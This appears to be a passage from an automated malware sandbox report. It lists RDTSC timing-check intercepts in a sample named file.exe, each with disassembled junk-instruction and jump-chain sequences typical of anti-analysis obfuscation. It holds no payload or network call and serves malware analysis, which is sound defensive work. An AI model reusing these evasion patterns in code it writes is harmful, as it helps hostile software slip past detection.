                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA13 second address: 107FA19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA19 second address: 107FA43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9D1073AE79h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA43 second address: 107FA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA4C second address: 107FA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA50 second address: 107FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA58 second address: 107FA5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D96D1 second address: 10D96D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB74C second address: 10DB750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB750 second address: 10DB75A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D106F7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCE77 second address: 10DCEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 7EB5BC35h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F9D1073AE68h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F9D1073AE68h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 jmp 00007F9D1073AE6Ch 0x0000004b xor di, 054Bh 0x00000050 push eax 0x00000051 pushad 0x00000052 push ebx 0x00000053 pushad 0x00000054 popad 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F9D1073AE71h 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBEFA second address: 10DBF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBF00 second address: 10DBF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F9D1073AE71h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DD0FF second address: 10DD103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A874 second address: 107A878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4A1D second address: 10E4A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9AE5 second address: 10E9AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9AEE second address: 10E9AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9C8A second address: 10E9CB0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D1073AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F9D1073AE70h 0x00000010 jc 00007F9D1073AE66h 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9CB0 second address: 10E9CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F7666h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9CCA second address: 10E9CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9CCE second address: 10E9CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9E48 second address: 10E9E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF72B second address: 10EF731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF731 second address: 10EF758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F9D1073AE6Ch 0x0000000b jnc 00007F9D1073AE66h 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9D1073AE6Fh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF758 second address: 10EF75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF75C second address: 10EF762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF84D second address: 10EF852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF91A second address: 10EF924 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D1073AE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF924 second address: F1EAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 1858996Ch 0x0000000d cld 0x0000000e push dword ptr [ebp+122D170Dh] 0x00000014 jne 00007F9D106F7672h 0x0000001a call dword ptr [ebp+122D1FE7h] 0x00000020 pushad 0x00000021 pushad 0x00000022 mov edx, 51D09851h 0x00000027 jmp 00007F9D106F7665h 0x0000002c popad 0x0000002d xor eax, eax 0x0000002f jmp 00007F9D106F765Ch 0x00000034 jmp 00007F9D106F7662h 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d mov dword ptr [ebp+122D20ABh], edi 0x00000043 mov dword ptr [ebp+122D2AA8h], eax 0x00000049 jmp 00007F9D106F7660h 0x0000004e cld 0x0000004f mov esi, 0000003Ch 0x00000054 sub dword ptr [ebp+122D23C2h], edi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D20ABh], edi 0x00000064 lodsw 0x00000066 stc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c push edi 0x0000006d mov edi, dword ptr [ebp+122D29E8h] 0x00000073 pop ebx 0x00000074 stc 0x00000075 popad 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a jno 00007F9D106F765Ch 0x00000080 nop 0x00000081 jmp 00007F9D106F765Dh 0x00000086 push eax 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F9D106F7662h 0x0000008f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4444 second address: 10F4448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4448 second address: 10F444C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3B8E second address: 10F3B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3B99 second address: 10F3B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3B9E second address: 10F3BA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3BA3 second address: 10F3BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9D106F7664h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3E74 second address: 10F3E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4161 second address: 10F4169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4169 second address: 10F416F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7800 second address: 10F781A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F9D106F765Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F9D106F7656h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8CF2 second address: 10C8CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F9D1073AE66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8CFC second address: 10C8D46 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F9D106F765Dh 0x00000010 lea eax, dword ptr [ebp+1247DA98h] 0x00000016 jmp 00007F9D106F765Ah 0x0000001b nop 0x0000001c jmp 00007F9D106F765Fh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F9D106F765Fh 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8D46 second address: 10C8D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C944B second address: 10C944F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C981A second address: 10C981F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C981F second address: 10C9842 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D106F765Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F9D106F765Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9BD8 second address: 10C9BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9BDD second address: 10C9BE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9BE2 second address: 10C9C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F9D1073AE68h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 0000001Eh 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F9D1073AE68h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 jmp 00007F9D1073AE71h 0x00000047 nop 0x00000048 jno 00007F9D1073AE74h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 jmp 00007F9D1073AE70h 0x00000059 popad 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9C68 second address: 10C9C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9C6E second address: 10C9C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9FEF second address: 10C9FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9FF3 second address: 10CA00E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9D1073AE73h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA00E second address: 10A7C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F9D106F7658h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov edi, ecx 0x00000029 lea eax, dword ptr [ebp+1247DA98h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F9D106F7658h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jmp 00007F9D106F7669h 0x0000004e push eax 0x0000004f jmp 00007F9D106F7665h 0x00000054 mov dword ptr [esp], eax 0x00000057 mov edx, dword ptr [ebp+122D2BA8h] 0x0000005d movzx edx, si 0x00000060 call dword ptr [ebp+12455316h] 0x00000066 push eax 0x00000067 push esi 0x00000068 push eax 0x00000069 pop eax 0x0000006a pop esi 0x0000006b push eax 0x0000006c push edx 0x0000006d jo 00007F9D106F7656h 0x00000073 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7DBA second address: 10F7DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F9D1073AE6Ch 0x0000000f jnp 00007F9D1073AE66h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7DDC second address: 10F7DE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7DE1 second address: 10F7DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F8513 second address: 10F852F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7660h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F9D106F765Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC4E0 second address: 10FC4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC4E4 second address: 10FC4F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7660h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC4F8 second address: 10FC4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC4FE second address: 10FC50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F9D106F7656h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC50A second address: 10FC50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC50E second address: 10FC533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jl 00007F9D106F7656h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FF744 second address: 10FF749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FF749 second address: 10FF78C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D106F766Eh 0x00000008 jnp 00007F9D106F7662h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9D106F765Dh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FF78C second address: 10FF7A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9D1073AE6Eh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FF7A0 second address: 10FF7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11059AD second address: 11059B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9D1073AE66h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11059B8 second address: 11059C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F9D106F7656h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11059C2 second address: 11059D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9D1073AE6Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104611 second address: 1104617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104617 second address: 1104637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 ja 00007F9D1073AE75h 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F9D1073AE6Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110479B second address: 11047CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D106F765Ch 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnl 00007F9D106F7656h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D106F765Fh 0x00000018 jno 00007F9D106F7656h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11047CA second address: 11047EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F9D1073AE8Bh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104C8C second address: 1104C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F765Eh 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104C9F second address: 1104CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F9D1073AE66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104CAB second address: 1104CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11042CF second address: 11042FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9D1073AE75h 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F9D1073AE66h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105103 second address: 1105115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F9D106F765Bh 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B293 second address: 110B298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B298 second address: 110B2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F9D106F7656h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F9D106F765Bh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a jnl 00007F9D106F7661h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B2C9 second address: 110B2D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109C2C second address: 1109C3F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D106F765Ch 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109D98 second address: 1109D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109D9C second address: 1109DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F7667h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109DB7 second address: 1109DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109DBB second address: 1109E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D106F7667h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jbe 00007F9D106F7667h 0x00000014 pushad 0x00000015 jmp 00007F9D106F7668h 0x0000001a jl 00007F9D106F7656h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
